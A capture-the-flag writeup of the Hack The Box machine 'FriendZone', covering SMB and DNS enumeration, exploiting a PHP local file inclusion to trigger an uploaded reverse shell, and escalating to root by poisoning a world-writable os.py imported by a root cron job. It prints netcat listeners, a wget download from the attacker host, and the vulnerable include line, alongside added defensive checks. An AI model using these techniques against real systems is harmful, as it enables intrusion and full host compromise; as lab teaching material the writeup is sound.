HacktheBox - FriendZone Writeup

13/07/2019

Initial Enumeration 

1. Nmap Scan

Let's start with a scan of the target IP address:

nmap -sV -oA nmap/initial.tcp 10.10.10.123

From the scan we can see an FTP server (a further scan with -sC shows it does not allow anonymous logins), ports 80 and 443 open, indicating a web server, likely shares via SMB and, to no surprise given the name of the box, port 53 open... DNS zone transfers? ;)

2. Web Server Enumeration - Port 80/443 

As always, let's get gobuster running whilst we check out the webpages:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.123

Nothing of interest was found by the gobuster scan.

https://10.10.10.123 Main webpage: 

As you can see, it has an email address of 'info@friendzoneportal.red'. With other boxes the domain is normally name_of_the_box.htb, but this time let's change .htb to .red and enter the domain names into our /etc/hosts file:

nano /etc/hosts
10.10.10.123     friendzoneportal.red friendzone.red

Browse to https://friendzone.red: 

Source code comment: 

As you can see, our first indication of a possible rabbit hole... or is it? Let's run another gobuster, this time on https://friendzone.red:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://friendzone.red

We find the following directories: /admin, /js/js and a file: /js/js/index.php 

We see that there is a /js/js directory... maybe this is what they meant by 'don't go too deep'?

Ah.. More cryptic messages! 

3. SMB Enumeration 

We find port 445 open, so let's have a look and see if we have access to any shares:

smbmap -H 10.10.10.123 

As you can see we have access to two shares, General (read-only access) and Development (read/write access)... This will be important later!

Let's mount the shares and view the contents:

sudo mount.cifs //10.10.10.123/general /mnt -o user=,pass=

The share contains a single file, creds.txt... and you guessed it, it contained credentials!

sudo mount.cifs //10.10.10.123/Development /mnt/friendzone/Development -o user=,pass=

The Development share doesn't contain anything... yet.

4. DNS Enumeration - Zone Transfer

From the name of the box, I'm assuming that DNS zone transfer is enabled... (oh no!) Let's confirm DNS zone transfer:

dig axfr friendzone.red @friendzone.red
dig axfr friendzoneportal.red @friendzone.red

5. Enumerate new domains: 

Let's add the new domains into our /etc/hosts file:

As you can see, there are plenty of domains, but we will focus on two, 'administrator1.friendzone.red' and 'uploads.friendzone.red' 

Let's start with uploads.friendzone.red:

We see the option to upload an image file, so let's try and upload a PHP reverse shell in Burp and change the content type to 'img/png':

Oh.. We get this message:

Rabbit hole? I think so...

Okay, let's check out administrator1.friendzone.red:

So this is what the creds.txt file was for! Use the creds to login...

Immediately we get an indication that we are on the right track, with the hint about dealing with a beginner PHP dev and the application not being tested yet. The dashboard.php file's 'pagename=' parameter is unsanitised: whatever is supplied has '.php' appended and is passed straight to include(). This is the vulnerable piece of the decoded dashboard.php code:

include($_GET["pagename"].".php");

Let's test for LFI by running a PHP file from another subdomain, 'uploads.friendzone.red':

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../uploads/upload
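To show why the '../uploads/upload' test above works, here is the resolution logic of include($_GET["pagename"].".php") reimplemented in Python, next to an allowlist version that rejects anything outside the web root. This is an added illustration, not the box's PHP code; WEB_ROOT and the page names in ALLOWED_PAGES are assumed values for the demo.

```python
from __future__ import annotations
import os

# Assumed for the demo: the admin site's document root and the only pages
# dashboard.php should ever include. The real paths on the box are not known here.
WEB_ROOT = "/var/www/admin"
ALLOWED_PAGES = {"home", "images"}


def vulnerable_include_target(pagename: str) -> str:
    """Mirror the unsanitised PHP: concatenate '.php' and let '..' resolve."""
    return os.path.normpath(os.path.join(WEB_ROOT, pagename + ".php"))


def escapes_web_root(pagename: str) -> bool:
    """True when the resolved include path lands outside WEB_ROOT (an LFI)."""
    target = vulnerable_include_target(pagename)
    return os.path.commonpath([WEB_ROOT, target]) != WEB_ROOT


def safe_include_target(pagename: str) -> str:
    """Hardened form: only a fixed set of page names is ever included.

    An allowlist beats trying to strip '../', because the attacker controls
    the whole string and PHP resolves the path after concatenation.
    """
    if pagename not in ALLOWED_PAGES:
        raise ValueError(f"rejected pagename: {pagename!r}")
    return os.path.join(WEB_ROOT, pagename + ".php")
```

The same functions resolve the later '../../../../../../../../etc/Development/php-reverse-shell' payload to a path under /etc, which is why the share-backed file gets included.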

Exploitation - User

6. Exploiting LFI in dashboard.php: 

Now that we know there is LFI in the 'pagename=' parameter of dashboard.php, let's put the read/write access to the Development share to good use and upload a PHP reverse shell to the share.

Start a netcat listener:

nc -lvnp 9001 

Right, now we have uploaded our reverse shell and started a netcat listener, it's time to execute our payload via the LFI:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../../../../etc/Development/php-reverse-shell 

We should now have a connection to our netcat listener.

Let's make the shell fully interactive:

python -c 'import pty;pty.spawn("/bin/bash");'
# press Ctrl+Z to background the shell, then:
stty raw -echo
fg

We have a shell as www-data on friendzone! 

whoami&&id&&hostname

Get the user.txt flag:

After a bit of searching around for interesting files, I looked in the /var/www directory and found the file 'mysql_data.conf'... it contained database credentials:

These creds work for SSH, so let's log in with them there to get a stable shell.

We are now running as the user, Friend. 

Privilege Escalation 

7. Use Priv Esc Scripts:

I like to start my priv esc by running automated enumeration tools like LinEnum.sh.

Start a SimpleHTTPServer on our attacker machine in the directory that contains LinEnum.sh:

python -m SimpleHTTPServer 80

On the friendzone machine, download LinEnum.sh and make it executable: 

wget http://<attackerIP>/LinEnum.sh
chmod +x LinEnum.sh

Start LinEnum.sh: 

./LinEnum.sh -t

Ah-ha. As a low-privilege user, we have modify and execute permissions on everything inside the Python library directory.

Another tool I like to use is pspy; it monitors Linux processes without needing root permissions. Download it from our machine in the same way as LinEnum.sh; we need the pspy64 version:

Start pspy64: 

./pspy64  

We find a cronjob running a script, 'reporter.py', as root. Let's look at the script code:

8. Exploit the reporter.py script and cronjob:

'reporter.py' imports the 'os' module. Remember we have modify and execute permissions on the 'os.py' script, which means we can poison the library, specifically 'os.py', and add a command we want root to run via system(<command>)... what about a netcat reverse shell?
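The root cause here is a privileged cron job importing from a library directory a low-privilege user can write to. Below is an added defender-side audit (not part of the writeup or the box) that walks a library directory and flags any .py file writable by group or other, which is exactly the condition LinEnum reported on os.py; the library tree it scans is constructed in a temp dir for the demo, and audit_sys_path() runs the same check over the interpreter's real sys.path.

```python
from __future__ import annotations
import os
import stat
import sys
import tempfile


def find_writable_modules(lib_dir: str) -> list[tuple[str, str]]:
    """Return (relative path, octal mode) for .py files writable by group or other.

    Any such file is a code-execution path for whoever imports it with
    higher privileges, e.g. a root cron job like reporter.py.
    """
    findings = []
    for root, _dirs, files in os.walk(lib_dir):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(root, name)
            mode = os.stat(path).st_mode
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((os.path.relpath(path, lib_dir), oct(stat.S_IMODE(mode))))
    return sorted(findings)


def audit_sys_path() -> list[tuple[str, str]]:
    """Run the check over every directory this interpreter would import from."""
    out = []
    for entry in sys.path:
        if os.path.isdir(entry):
            out.extend(find_writable_modules(entry))
    return out


def build_demo_library() -> str:
    """Constructed fixture: a fake library dir where os.py is mode 777 as on the box."""
    lib = tempfile.mkdtemp(prefix="pylib_")
    for name, mode in (("os.py", 0o777), ("json.py", 0o644)):
        path = os.path.join(lib, name)
        with open(path, "w") as fh:
            fh.write("# stand-in module for the demo\n")
        os.chmod(path, mode)
    return lib


def demo() -> list[tuple[str, str]]:
    """Audit the constructed library; only the world-writable os.py is reported."""
    return find_writable_modules(build_demo_library())


if __name__ == "__main__":
    for rel, mode in demo():
        print(f"writable module: {rel} ({mode})")
```

On a live host, an empty result from audit_sys_path() for the interpreter root's cron uses is the condition that would have closed this escalation.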

Start a netcat listener:

nc -lvnp 9002 

Execute the reporter.py script:

We should now have a connection on our netcat listener as root!

Let's make the shell fully interactive:

python -c 'import pty;pty.spawn("/bin/bash");'
# press Ctrl+Z to background the shell, then:
stty raw -echo
fg

We have a shell as root on FriendZone!

whoami&&id&&hostname

Get the root.txt flag: